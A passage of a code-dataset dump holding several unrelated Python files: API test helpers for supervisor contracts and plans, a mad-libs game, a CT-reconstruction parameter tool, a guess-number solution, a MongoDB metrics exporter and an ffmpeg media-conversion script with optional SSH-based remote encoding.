request_hash,\n }\n\n post_body = json.dumps(post_body)\n\n resp = endtoend.helper.send_request(\n \"post\", \"/v1/supervisor-contracts\", data=post_body\n )\n log.info(\"Supervisor contract %s created.\", resp[\"id\"])\n\n return resp\n\n\ndef create_supervisor_contract_version(\n supervisor_contract_id,\n display_name,\n code,\n description=None,\n supervisor_contract_version_id=None,\n):\n\n e2e_display_name = \"e2e_\" + display_name\n\n if not description:\n description = \"Description of \" + e2e_display_name\n\n code_hash = hashlib.md5((code).encode(\"utf-8\")).hexdigest()\n\n post_body = {\n \"supervisor_contract_version\": {\n \"id\": supervisor_contract_version_id,\n \"supervisor_contract_id\": supervisor_contract_id,\n \"display_name\": e2e_display_name,\n \"description\": description,\n \"code\": code,\n },\n \"request_id\": code_hash,\n }\n\n post_body = json.dumps(post_body)\n\n resp = endtoend.helper.send_request(\n \"post\", \"/v1/supervisor-contract-versions\", data=post_body\n )\n log.info(\"Supervisor contract %s version uploaded.\", resp[\"id\"])\n endtoend.testhandle.supervisorcontract_name_to_id[display_name] = resp[\"id\"]\n\n return resp\n\n\ndef upload_supervisor_contracts(supervisor_contracts):\n # The supervisee alias may be different from the contract ID used in the E2E test file.\n # We need this mapping to easily replace the specified alias with the uploaded contracts\n supervisee_alias_to_version_id = {\n endtoend.testhandle.CONTRACTS[pid].get(\n \"supervisee_alias\", pid\n ): endtoend.contracts_helper.get_current_product_version_id(pid)\n for pid in endtoend.testhandle.contract_pid_to_uploaded_pid\n }\n\n for product_id, contract_properties in supervisor_contracts.items():\n if \"path\" not in contract_properties:\n raise NameError(\n \"Contract: {} not specified with path. \"\n \"Specified with {}\".format(product_id, str(contract_properties))\n )\n\n contractfile = contract_properties[\"path\"]\n with open(contractfile, \"r\") as cfile:\n contractdata = cfile.read()\n\n supervisor_contract = create_supervisor_contract(product_id)\n\n contractdata = replace_supervisee_version_ids_in_supervisor(\n contractdata, supervisee_alias_to_version_id\n )\n\n create_supervisor_contract_version(\n supervisor_contract[\"id\"], product_id, contractdata\n )\n\n\ndef create_plan(\n supervisor_contract_version_id: str, account_id: str = None, details: Dict = None\n) -> str:\n request_id = uuid.uuid4().hex\n\n post_body = {\n \"plan\": {\n \"id\": account_id,\n \"supervisor_contract_version_id\": supervisor_contract_version_id,\n \"details\": details,\n },\n \"request_id\": request_id,\n }\n\n post_body = json.dumps(post_body)\n\n resp = endtoend.helper.send_request(\"post\", \"/v1/plans\", data=post_body)\n log.info(\"Plan %s created.\", resp[\"id\"])\n endtoend.testhandle.plans.append(resp[\"id\"])\n\n return resp[\"id\"]\n\n\ndef close_all_plans():\n for plan_id in endtoend.testhandle.plans:\n close_plan(plan_id)\n\n\ndef close_plan(plan_id):\n request_id = uuid.uuid4().hex\n\n post_body = {\n \"plan_update\": {\"plan_id\": plan_id, \"closure_update\": {}},\n \"request_id\": request_id,\n }\n\n post_body = json.dumps(post_body)\n\n resp = endtoend.helper.send_request(\"post\", \"/v1/plan-updates\", data=post_body)\n log.info(\"Close plan: %s for plan: %s sent.\", resp[\"id\"], plan_id)\n\n return resp\n\n\ndef get_plan_update(plan_update_id: str) -> Dict:\n params = {\"ids\": [plan_update_id]}\n resp = endtoend.helper.send_request(\n \"get\", \"/v1/plan-updates:batchGet\", params=params\n )\n\n return next(iter(resp[\"plan_updates\"].values()))\n\n\ndef get_plan_updates_by_ids(plan_update_ids: List[str]) -> Dict[str, Dict]:\n \"\"\"\n Fetch details for one or more plan update ids.\n :param plan_update_ids: a collection of plan update ids\n :return: dict with id and update plan information\n \"\"\"\n params = {\"ids\": plan_update_ids}\n resp = endtoend.helper.send_request(\n \"get\", \"/v1/plan-updates:batchGet\", params=params\n )\n return resp[\"plan_updates\"]\n\n\ndef create_plan_update(\n plan_id: str,\n plan_action_type: str,\n action: Dict[str, Any],\n status: str = None,\n account_id: str = None,\n) -> Dict[str, Any]:\n request_id = uuid.uuid4().hex\n\n post_body = {\n \"plan_update\": {\"id\": account_id, \"plan_id\": plan_id, \"status\": status},\n \"request_id\": request_id,\n }\n\n post_body[\"plan_update\"][plan_action_type] = action\n\n post_body = json.dumps(post_body)\n\n resp = endtoend.helper.send_request(\"post\", \"/v1/plan-updates\", data=post_body)\n log.info(\"Plan_update: %s for plan: %s sent.\", resp[\"id\"], plan_id)\n\n return resp\n\n\ndef wait_for_plan_updates(\n plan_update_ids: List[str], target_status=\"PLAN_UPDATE_STATUS_COMPLETED\"\n) -> None:\n\n \"\"\"\n Verrify if given one or more plan update ids are of target status.\n :param plan_update_ids: a collection of plan update ids\n :param target_status: the plan update status to wait for\n \"\"\"\n if endtoend.testhandle.use_kafka:\n wait_for_plan_updates_by_id(\n plan_update_ids=plan_update_ids,\n target_status=target_status,\n )\n else:\n # result_wrapper verifies if all plan_updates have target_status\n # and get_plan_updates_by_ids was able to fetch details for all requested ids\n endtoend.helper.retry_call(\n func=get_plan_updates_by_ids,\n f_args=[plan_update_ids],\n expected_result=True,\n result_wrapper=lambda data: all(\n item[\"status\"] == target_status for _, item in data.items()\n )\n and data.keys() == set(plan_update_ids),\n failure_message=f'\"One of plan updates in {plan_update_ids} never completed.\\n\"',\n )\n\n\n@kafka_only_helper\ndef wait_for_plan_updates_by_id(\n plan_update_ids: List[str],\n target_status: str = \"PLAN_UPDATE_STATUS_COMPLETED\",\n) -> None:\n \"\"\"\n Listen to the plan update events Kafka topic for specific plan update ids.\n :param plan_update_ids: a collection of plan update ids to listen for\n :param target_status: the plan update status to wait for\n \"\"\"\n consumer = endtoend.testhandle.kafka_consumers[PLAN_UPDATE_EVENTS_TOPIC]\n\n def matcher(event_msg, unique_message_ids):\n if target_status == \"PLAN_UPDATE_STATUS_PENDING_EXECUTION\":\n plan_update_wrapper = event_msg.get(\"plan_update_created\")\n else:\n plan_update_wrapper = event_msg.get(\"plan_update_updated\")\n event_request_id = event_msg[\"event_id\"]\n if plan_update_wrapper:\n plan_update = plan_update_wrapper[\"plan_update\"]\n if plan_update[\"id\"] in unique_message_ids:\n if plan_update[\"status\"] == target_status:\n return plan_update[\"id\"], event_request_id, True\n\n if plan_update[\"status\"] in TERMINAL_PLAN_STATUSES:\n log.warning(\n f\"Plan update {plan_update['id']} returned a status of \"\n f\"{plan_update['status']}\"\n )\n return \"\", event_request_id, False\n\n failed_plan_updates = wait_for_messages(\n consumer,\n matcher=matcher,\n callback=None,\n unique_message_ids={update_id: None for update_id in plan_update_ids},\n inter_message_timeout=30,\n matched_message_timeout=30,\n )\n\n if len(failed_plan_updates) > 0:\n raise Exception(\n f\"Failed to retrieve {len(failed_plan_updates)} of {len(plan_update_ids)} \"\n f\"plan updates for update ids: {', '.join(failed_plan_updates)}\"\n )\n\n\ndef create_and_wait_for_plan_update(\n plan_id: str,\n plan_action_type: str,\n action: Dict[str, Any],\n status: str = None,\n account_id: str = None,\n) -> Dict[str, Any]:\n plan_update = create_plan_update(\n plan_id, plan_action_type, action, status, account_id\n )\n plan_update_id = plan_update[\"id\"]\n wait_for_plan_updates([plan_update_id])\n return plan_update\n\n\ndef add_account_to_plan(plan_id, account_id):\n action = {\"account_id\": account_id}\n log.info(f\"preparing to link account {account_id} to plan {plan_id}\")\n return create_and_wait_for_plan_update(plan_id, \"associate_account_update\", action)\n\n\ndef link_accounts_to_supervisor(supervisor_contract, account_list):\n supervisor_contract_version_id = endtoend.testhandle.supervisorcontract_name_to_id[\n supervisor_contract\n ]\n plan_id = create_plan(supervisor_contract_version_id)\n\n for account in account_list:\n add_account_to_plan(plan_id, account)\n\n return plan_id\n\n\ndef get_plan_associations(account_ids=None, plan_ids=None):\n if not account_ids and not plan_ids:\n raise NameError(\"account id nor plan id specified\")\n if account_ids and not isinstance(account_ids, list):\n account_ids = [account_ids]\n if plan_ids and not isinstance(plan_ids, list):\n plan_ids = [plan_ids]\n\n params = {\"account_ids\": account_ids, \"plan_ids\": plan_ids, \"page_size\": \"100\"}\n\n resp = endtoend.helper.send_request(\"get\", \"/v1/account-plan-assocs\", params=params)\n\n return resp[\"account_plan_assocs\"]\n\n\ndef get_plan_schedules(plan_id=None, page_size=\"20\"):\n if not plan_id:\n raise NameError(\"plan id not specified\")\n\n params = {\"plan_id\": plan_id, \"page_size\": page_size}\n\n resp = endtoend.helper.send_request(\"get\", \"/v1/plan-schedules\", params=params)\n\n schedule_ids = [s[\"id\"] for s in resp[\"plan_schedules\"]]\n\n response_schedules = endtoend.core_api_helper.get_schedules(schedule_ids)\n\n # A dict of schedule event_names to their schedule objects\n return {\n schedule_details[\"display_name\"].split()[0]: schedule_details\n for schedule_details in response_schedules.values()\n if schedule_details[\"status\"] != \"SCHEDULE_STATUS_DISABLED\"\n and re.search(rf\"{plan_id}\", schedule_details[\"display_name\"])\n }\n\n\ndef get_plan_details(plan_id):\n\n params = {\"ids\": plan_id}\n\n resp = endtoend.helper.send_request(\"get\", \"/v1/plans:batchGet\", params=params)\n\n return resp[\"plans\"][plan_id]\n\n\ndef check_plan_associations(\n test: unittest.TestCase, plan_id: str, accounts: Union[List[str], Dict[str, str]]\n):\n \"\"\"\n Helper method to validate that plan currently has expected associations. If a given account has\n been through multiple associations with the same plan, only the latest is considered\n :param plan_id: the plan id\n :param account_ids: the account ids to validate are currently linked. If passed as a list, the\n link statuses are assumed to be active. If passed as a dict, the values are the statuses and the\n keys are the account ids.\n \"\"\"\n plan_associations = endtoend.supervisors_helper.get_plan_associations(\n plan_ids=plan_id\n )\n\n # there could be multiple assocs with different statuses, but we'll only consider the latest\n actual_linked_accounts = {\n association[\"account_id\"]: association[\"status\"]\n for association in plan_associations\n }\n\n if isinstance(accounts, list):\n accounts = {\n account_id: \"ACCOUNT_PLAN_ASSOC_STATUS_ACTIVE\" for account_id in accounts\n }\n\n test.assertEqual(\n actual_linked_accounts,\n accounts,\n \"latest and expected associations do not match\",\n )\n","sub_path":"common/test_utils/endtoend/supervisors_helper.py","file_name":"supervisors_helper.py","file_ext":"py","file_size_in_byte":13097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"163057494","text":"import re\n\nfilePath = input(\"Please provide a file path to a text file: \")\nmadLibsFile = open(filePath)\ncontent = madLibsFile.read()\n\nwordListRx = re.findall(r'(\\w+)(\\s|[?.!](\\s?))', content)\nbuilderList = []\n\nfor i in range(len(wordListRx)):\n rules = ['ADJECTIVE' in wordListRx[i],\n 'NOUN' in wordListRx[i],\n 'VERB' in wordListRx[i],\n 'ADVERB' in wordListRx[i]]\n \n if any(rules):\n partOfSpeechTupleToList = [''.join(i) for i in wordListRx[i]]\n userResponse = input(f\"Enter an {partOfSpeechTupleToList[0].lower()}: \")\n tupleToList = [''.join(i) for i in wordListRx[i]]\n builderList.extend([userResponse, tupleToList[1]])\n else:\n builderList += [''.join(i) for i in wordListRx[i]]\n\nfinalString = ''.join(builderList)\nprint(finalString)\n\n","sub_path":"madlibs.py","file_name":"madlibs.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"635972612","text":"\"\"\"\nWritten by Michelle Skip\nCode is to allow interactive determination of CT parameters: Centre of rotation offset, and angular step.\n\nTo-do-list:\n\n*use slidermin and slidermax to make intensity not overlap\n*Get tomopy to do subpixel cor\n*ignore tomopywarning or stop it from printing out\n*have precompute and compute on the fly options\n\"\"\"\n\nPROJECTION_DIR = \"F:\\\\17277B_right\\Corrected_data_centre\" #Directory containing the CT projections\nPROJECTION_NAME = '\\*Z1*.tif'\nMAKE_SINOGRAM = False #True: read in projections, create sinogram and save a copy in projectio directory, False: read in previously made sinogram\nSLICE = 900 #the y value in FIJI / ImageJ of the slice of interest (First row = 0, if display size was 100 pixels tall, last row would be 99, as starting at 0)\n\nCENTRE_OF_ROTATION_OFFSET_MIN = 52 #minimum cor value to reconstuct\nCENTRE_OF_ROTATION_OFFSET_MAX = 52 #maximum cor value to reconstuct\nCENTRE_OF_ROTATION_OFFSET_STEP = 1. #Step size to move between min and max\n\nROTATION_ANGLE_MIN =179\nROTATION_ANGLE_MAX =181\nROTATION_ANGLE_STEP =0.25\n\nimport glob\nimport tifffile as tiff \nimport numpy as np\nfrom skimage import io\nfrom scipy import ndimage\nimport tomopy\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider\nimport pbi_sipr_kitchen\nfrom dask import delayed, compute, threaded, multiprocessing\nfrom dask.diagnostics import Profiler, ProgressBar\nfrom scipy import ndimage\n\n# Read in projections and create sinogram, or read in sinogram previously created\nsino_paths = glob.glob(PROJECTION_DIR+'\\*_sino.tif') #checks for sinograms in the directory\nprojection_paths = sorted(set(glob.glob(PROJECTION_DIR+PROJECTION_NAME))\n -set(sino_paths)) #Creates a list of files in the projection directory.removes the sinograms from the list and sorts the projections\nnumber_projections = len(projection_paths) #counts the number of projections in the CT\n\n\ndef read_projection(projection_number, path):\n \"\"\"\n Reads in a projection\n Use this with DASK to create sinograms quickly\n \"\"\"\n global sinogram\n projection = tiff.imread(path)\n sinogram[projection_number,0,:] = projection[SLICE,:]\n return\n\nif MAKE_SINOGRAM:\n projection = tiff.imread(projection_paths[0])\n sinogram = np.ones([number_projections,1,projection.shape[1]])\n print(\"Making sinograms\")\n\n values = [delayed(read_projection)(projection_number, path) for \n projection_number, path in enumerate(projection_paths)]\n with Profiler() as prof, ProgressBar():\n compute(*values, scheduler='threads') #run on local windows use threaded.get\n\n np.clip(sinogram,1e-10,None, out= sinogram) #removes negative values in the sinogram\n sinogram = -np.log(sinogram)\n tiff.imsave(PROJECTION_DIR+\"\\\\\"+str(SLICE)+\"_sino.tif\", \n sinogram.astype(np.float32))\nelse:\n print(\"Reading in sinogram\")\n sinogram = tiff.imread(PROJECTION_DIR+\"\\\\\"+str(SLICE)+\"_sino.tif\")\n\n\n#Pre compute reconstructions\n\noptions = {'tx_sinogram_type':'cuda', 'method':'FBP_CUDA'} #astra options\n#options = {'tx_sinogram_type':'linear', 'method':'FBP'}\n\ncor_range = np.linspace(CENTRE_OF_ROTATION_OFFSET_MIN + sinogram.shape[2]/2.,\n CENTRE_OF_ROTATION_OFFSET_MAX + sinogram.shape[2]/2.,\n (CENTRE_OF_ROTATION_OFFSET_MAX-CENTRE_OF_ROTATION_OFFSET_MIN)/\n CENTRE_OF_ROTATION_OFFSET_STEP +1) \nrotation_range = np.linspace(ROTATION_ANGLE_MIN,\n ROTATION_ANGLE_MAX,\n (ROTATION_ANGLE_MAX-ROTATION_ANGLE_MIN)/ROTATION_ANGLE_STEP +1)\n\nreconstructions =np.zeros([len(cor_range),len(rotation_range),\n sinogram.shape[2],sinogram.shape[2]])\n\nnumber_of_recons = len(cor_range)*len(rotation_range)\ncount = 0\n\n\nfor j, rotation in enumerate(rotation_range):\n angles = (np.linspace(0,rotation,num=number_projections)*np.pi)/180.\n for i, cor in enumerate(cor_range):\n count+=1\n print(f\"Making recontruction {count} of {number_of_recons}\")\n tomo = tomopy.recon(sinogram,angles,center=cor,\n algorithm=tomopy.astra, options=options)\n reconstructions[i,j,:,:]= np.squeeze(tomo)\n\n# Create figure and sliders\nfigure = plt.figure(figsize =(18,12)) #Creates the figure object and sets it so that it opens fullscreen\ndisplay = plt.subplot(1,2,1) #Creates the display axes, and positions in on the left hand side, leaving space on the right for the slider bars\nimage = display.imshow(np.squeeze(reconstructions[0,0,:,:])) #puts the reconstuction in the display axes\n\nrecon_min = np.amin(reconstructions[0,0,:,:])\nrecon_max = np.amax(reconstructions[0,0,:,:])\nintensity_min = Slider(plt.axes([0.6, 0.1, 0.35, 0.03]),\n \"Minimum Intensity\",\n recon_min,\n recon_max, \n valinit=recon_min,\n valstep=0.0001,\n )\nintensity_max = Slider(plt.axes([0.6, 0.2, 0.35, 0.03]), \n \"Maximum Intensity\",\n recon_min,\n recon_max,\n valinit=recon_max,\n valstep=0.0001)\ncoro_slider = Slider(plt.axes([0.6,0.3,0.35, 0.03]), \n \"Centre of rotation offset\",\n CENTRE_OF_ROTATION_OFFSET_MIN,\n CENTRE_OF_ROTATION_OFFSET_MAX,\n valinit = CENTRE_OF_ROTATION_OFFSET_MIN,\n valstep=CENTRE_OF_ROTATION_OFFSET_STEP)\nangle_slider = Slider(plt.axes([0.6,0.4,0.35, 0.03]), \n \"Angle of rotation\",\n rotation_range[0],\n rotation_range[-1],\n valinit = rotation_range[0],\n valstep=ROTATION_ANGLE_STEP)\n\ndef update_plot(val):\n \n cor_index = np.where(np.around(cor_range,decimals= 1) == \n round(coro_slider.val + sinogram.shape[2]/2. ,1))[0][0]\n angle_index = np.where(np.around(rotation_range,decimals= 3) == \n round(angle_slider.val, 3))[0][0]\n \n image.set_data(np.clip(reconstructions[cor_index,angle_index,:,:],\n intensity_min.val,intensity_max.val))\n image.set_clim([intensity_min.val,intensity_max.val])\n \n figure.canvas.draw_idle()\n\nintensity_min.on_changed(update_plot)\nintensity_max.on_changed(update_plot)\ncoro_slider.on_changed(update_plot)\nangle_slider.on_changed(update_plot)\nplt.show()\n\n\ncor_index = np.where(np.around(cor_range,decimals= 1) == \n round(coro_slider.val + sinogram.shape[2]/2. ,1))[0][0]\nangle_index = np.where(np.around(rotation_range,decimals= 3) == \n round(angle_slider.val, 3))[0][0]\ncor_range\n\nprint(f'CORO = {coro_slider.val}, angle of rotation = {angle_slider.val}, and angular step = {angle_slider.val / number_projections}')\n \n","sub_path":"CT_parameters.py","file_name":"CT_parameters.py","file_ext":"py","file_size_in_byte":6288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"390265283","text":"# 猜数字大小\n# 我们正在玩一个猜数字游戏。 游戏规则如下:\n# 我从 1 到 n 选择一个数字。 你需要猜我选择了哪个数字。\n# 每次你猜错了,我会告诉你这个数字是大了还是小了。\n# 你��用一个预先定义好的接口 guess(int num),它会返回 3 个可能的结果(-1,1 或 0):\n#\n# -1 : 我的数字比较小\n# 1 : 我的数字比较大\n# 0 : 恭喜!你猜对了!\n# 示例 :\n#\n# 输入: n = 10, pick = 6\n# 输出: 6\n\n# The guess API is already defined for you.\n# @param num, your guess\n# @return -1 if my number is lower, 1 if my number is higher, otherwise return 0\ntarget = 9\ndef guess(num):\n global target\n # print(num,target)\n if num > target:\n return -1\n elif num < target:\n return 1\n return 0\n\n# print(guess(6))\n# print(guess(7))\n# print(guess(5))\n\n\nclass Solution(object):\n def guessNumber(self, n):\n left = 1\n right = n\n while left <= right:\n mid = (left + right) // 2\n if guess(mid) == 1:\n left = mid + 1\n elif guess(mid) == -1:\n right = mid - 1\n else:\n return mid\n\n return -1\n\ns = Solution()\nprint('ret:',s.guessNumber(10))\n","sub_path":"guessNumber.py","file_name":"guessNumber.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"412954740","text":"from pymongo import MongoClient\n\n\ndef getIssueType(e):\n allFiles = e['files']\n for f in allFiles:\n allMetrics = f['metrics']\n if 'Related issue type' in allMetrics:\n return allMetrics['Related issue type']['value']\n\ndef dumpToFile(filename, listOfLists):\n with open(filename,'w') as f:\n for l in listOfLists:\n line = ' '.join([str(n) for n in l])+'\\n'\n f.write(line)\n\n\nc = MongoClient()\ndb = c.bugprediction\nallRevisionEntries = db.revisions.find()\n\nnoIssueRevisionEntries = []\nbugRevisionEntries = []\nexcRevisionEntries = []\nbothRevisionEntries = []\notherIssueRevisionEntries = []\n\nallValueEntries = []\n\ntargetLists = {\n 0.0: noIssueRevisionEntries,\n 1.0: bugRevisionEntries,\n 2.0: excRevisionEntries,\n 3.0: bothRevisionEntries,\n 4.0: otherIssueRevisionEntries\n}\n\nmetrics = ['Change frequency',\n 'File age',\n 'Time since last edit',\n 'Number of affecting commits',\n 'Number of authors']\n\n\nfor e in allRevisionEntries:\n issueType = getIssueType(e)\n # print e['_id']\n allFiles = e['files']\n for f in allFiles:\n allMetrics = f['metrics']\n valuesList = [allMetrics[m]['value'] for m in metrics]\n allValueEntries.append(valuesList)\n targetLists[issueType].append(valuesList)\n\n\ndumpToFile(\"all.txt\", allValueEntries)\ndumpToFile(\"noIssue.txt\", noIssueRevisionEntries)\ndumpToFile(\"bug.txt\", bugRevisionEntries)\ndumpToFile(\"except.txt\", excRevisionEntries)\ndumpToFile(\"both.txt\", bothRevisionEntries)\ndumpToFile(\"other.txt\", otherIssueRevisionEntries)\n\n\n\n\n","sub_path":"data/mongo-metrics-fetch/fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"130291733","text":"# The MIT License(MIT)\n# Copyright(c) 2019 Tiago Santos\n# Copyright(c) 2016 Joseph Milazzo\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation\n# files(the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy,\n# modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE \n# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR \n# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, \n# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n# This script will convert all the video files in your library to one format\n# The settings below are designed to optimize streaming to Chromecast\n#\n# Requirements:\n# Python 3\n# python-psutil\n# python-mediainfo\n# python-paramiko\n# ffmpeg\n#\n# NEW VERSION:\n# This script implements running the ffmpeg conversion remotely\n# To do so, another computer will have to have a folder with the ffmpeg binaries and a running SSH Server\n# The file to be converted is sent via SFTP, and then the command is executed via SSH\n# The conversion will only be done remotely if video encoding is needed\n#\n# Usage:\n#\n# Edit settings below\n# Run with \"python3 media_convert_2.py\"\n# This script has been tested on Linux only, but should work on windows\n# To run on Windows, be sure to remove the \"nice -n 20\" part from the beggining of ffmpeg_base_cmd\n# and add the ffmpeg folder to PATH or insert the full path on ffmpeg_base_cmd\n\n# This is based off of the media-convert script created by Joseph Milazzo\n# https://bitbucket.org/majora2007/media-convert/src/master/\n\nfrom collections import defaultdict\nimport os\nimport logging\nfrom pymediainfo import MediaInfo\nimport paramiko\nimport subprocess\nimport signal\nimport psutil\nimport time\nimport sys\n\n#######################################################################\n# Variables #\n#######################################################################\n\n# Desired extension for files. Best container for streaming to chromecast is mp4\nglobal EXT\nEXT = 'mp4'\n\n# Where to store temporary and log files\nwork_dir = '/home/plex/'\n\n# Temporary enconding file\ntemp_file = work_dir + 'temp.' + EXT\n\n# A list of directories to scan\nwatched_folders = ['/home/plex/video']\nexclude = []\n\n# Conditions for video recoding\nMAX_BITRATE = 5000000\nMAX_HEIGHT = 1080\nMAX_WIDTH = 1920\nVIDEO_CODEC = \"AVC\"\nVIDEO_PROFILE = \"Main\"\n\n# Recode all videos ending with these extensions\nvalid_extensions = ['rmvb', 'mkv', 'avi', 'mov', 'wmv', 'm4v']\n\n# Conditions for audio recoding. Chromecast may force sorround audio on stereo TVs, so force channels to 2 to convert all files to stereo audio\nMAX_CHANNELS = 2\nAUDIO_CODEC = \"AAC\"\n\n# FFMPEG parameters\nffmpeg_base_cmd = \"nice -n 20 ffmpeg -loglevel error -hide_banner -y -i \"\nffmpeg_video_encode = \" -c:v libx264 -preset faster -tune zerolatency -profile:v main -pix_fmt yuv420p -crf 23 -b:v 0 -maxrate \" + str(MAX_BITRATE) + \" -bufsize \" + str(int(MAX_BITRATE/2)) + \" -vf \\\"pad=\\'ceil(min(\" + str(MAX_WIDTH) + \",iw)/2)*2\\':\\'ceil(min(\" + str(MAX_HEIGHT) + \",ih)/2)*2\\',scale=\\'min(\" + str(MAX_WIDTH) + \",iw)\\':\\'min(\" + str(MAX_HEIGHT) + \",ih)\\':force_original_aspect_ratio=decrease\\\"\"\nffmpeg_audio_encode = \" -c:a aac -ac 2 -b:a 192k\"\nffmpeg_middle_cmd = \" -max_muxing_queue_size 1024 -map_metadata -1 -movflags +faststart\"\n\n# Flag to denote whether to delete source files after successfull encode\nDELETE = True\n\n# Flag to denote whether to just run MediaInfo on files\nJUST_CHECK = False\n\n# Verbosity level on log file\nLOG_LEVEL = logging.INFO\n\n#######################################################################\n# Remote Conversion (SSH) #\n#######################################################################\n\n# If enabled, when a video conversion is needed, the script will send the file to a remote host and execute the ffmpeg command there\nssh_enabled = True\n\n# Settings for ssh connection. Password can be either the password for the user or for the key file.\nssh_host = \"192.168.1.1\"\nssh_port = 22\nssh_user = \"johndoe\"\nssh_password = \"supersecret\"\nssh_key = \"/path/to/keyfile\"\n\n# This folder must contain the ffmpeg executable and will store the temporary video files. \n# Use an exclusive folder for this as files may be deleted or overwritten.\nssh_folder = \"C:\\\\ffmpeg\"\n\nssh_ffmpeg_base_cmd = \"ffmpeg.exe -loglevel error -hide_banner -y -i \"\nssh_ffmpeg_video_encode = \"-c:v h264_nvenc -preset slow -zerolatency 1 -profile:v main -pix_fmt yuv420p -cq 24 -qmin 23 -qmax 25 -b:v 0 -maxrate \" + str(MAX_BITRATE) + \" -bufsize \" + str(int(MAX_BITRATE/2)) + \" -vf \\\"pad=\\'ceil(min(\" + str(MAX_WIDTH) + \",iw)/2)*2\\':\\'ceil(min(\" + str(MAX_HEIGHT) + \",ih)/2)*2\\',scale=\\'min(\" + str(MAX_WIDTH) + \",iw)\\':\\'min(\" + str(MAX_HEIGHT) + \",ih)\\':force_original_aspect_ratio=decrease\\\"\"\nssh_ffmpeg_audio_encode = \" -c:a aac -ac 2 -b:a 192k\"\nssh_ffmpeg_middle_cmd = \" -max_muxing_queue_size 1024 -map_metadata -1 -movflags +faststart\"\n\n#######################################################################\n# Program #\n#######################################################################\n\n# Paths to all valid files\npaths = []\n\n# List of conversions\ncommands = []\n\nglobal ssh_client\nglobal sftp_client\n\ndef setup_logger(dir, filename, debug_lvl):\n log_file = filename\n log_directory = os.path.abspath(dir)\n\n if not os.path.exists(log_directory):\n os.mkdir(log_directory)\n\n log_filePath = os.path.join(log_directory, log_file)\n\n if not os.path.isfile(log_filePath):\n with open(log_filePath, \"w\") as emptylog_file:\n emptylog_file.write('')\n\n logging.basicConfig(filename=log_filePath, level=debug_lvl,\n format='%(asctime)s %(message)s')\n\n\ndef needs_convert(file):\n for extension in valid_extensions:\n if file.endswith(extension):\n logger.warning('Change format: ' + file)\n return True\n if file.endswith(EXT):\n stinfo = os.stat(file)\n if stinfo.st_mtime > stinfo.st_atime:\n logger.debug('Ignore: ' + file)\n return False\n logger.warning('Recode: ' + file)\n return True\n return False\n\n\ndef normalize_path(path):\n return path.replace('\\\\', '/')\n\n\ndef to_mp4_naming(filename):\n parts = filename.split('.')\n parts[len(parts)-1] = EXT\n output_path = '.'.join(parts)\n return output_path\n\n\ndef delete(path):\n logger = logging.getLogger(__name__)\n logger.info('Deleting ' + path)\n try:\n os.remove(path)\n except OSError:\n logger.exception('There was an issue deleting ' + path)\n\ndef remote_delete(path):\n logger = logging.getLogger(__name__)\n logger.info('Deleting on remote folder: ' + path)\n try:\n sftp_client.remove(path)\n except IOError:\n logger.exception('There was an issue deleting ' + path)\n\ndef move(file_from, file_to):\n logger = logging.getLogger(__name__)\n logger.info('Moving ' + file_from + ' to ' + file_to)\n try:\n os.rename(file_from, file_to)\n except OSError:\n logger.exception('There was an issue moving ' +\n file_from + ' to ' + file_to)\n\n\ndef signal_handler(signum, frame):\n pass\n\n\nif __name__ == '__main__':\n setup_logger(work_dir, 'media-convert.log', LOG_LEVEL)\n logger = logging.getLogger(__name__)\n # Register signals, such as CTRL + Cf\n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n logger.info(\"######### Script Executed at \" +\n time.asctime(time.localtime(time.time())))\n \n t0 = time.time()\n\n for base_path in watched_folders:\n base_path = normalize_path(base_path)\n logger.info('Searching for files in ' + base_path)\n t0 = time.time()\n for root, dirs, files in os.walk(base_path, topdown=True):\n dirs[:] = [d for d in dirs if d not in exclude]\n for file in files:\n if needs_convert(os.path.join(root, file)):\n path = os.path.join(root, file)\n paths.append(normalize_path(path))\n t1 = time.time()\n logger.info('[Directory Scan] Execution took %s seconds' % str(round(t1-t0,0)))\n logger.info('=====Scan Complete=====')\n logger.info('Total files scanned: ' + str(len(paths)))\n\n if len(paths) > 0:\n logger.info('Converting...')\n \n if ssh_enabled == True and len(paths) > 0:\n ssh_client = paramiko.SSHClient()\n ssh_client.load_system_host_keys()\n try:\n ssh_client.connect(ssh_host, username=ssh_user, password=ssh_password, key_filename=ssh_key)\n except Exception as e:\n logger.error(\"SSH Error: \" + str(e))\n ssh_enabled = False\n if ssh_enabled:\n try:\n sftp_client = ssh_client.open_sftp()\n except Exception as e:\n logger.error(\"Error opening SFTP session: \" + str(e))\n ssh_enabled = False\n if ssh_enabled:\n try:\n sftp_client.chdir(ssh_folder)\n except IOError:\n logger.error(\"Invalid SFTP folder\")\n ssh_client.close()\n ssh_enabled = False\n if ssh_enabled:\n logger.info(\"SSH and SFTP sessions created successfully\")\n else:\n logger.warning(\"Disabling remote recoding due to SSH error\")\n \n count = 0.0\n for path in paths:\n count += 1.0\n cur_file = normalize_path(path)\n ffmpeg_cmd = ffmpeg_base_cmd + \"\\\"\" + cur_file + 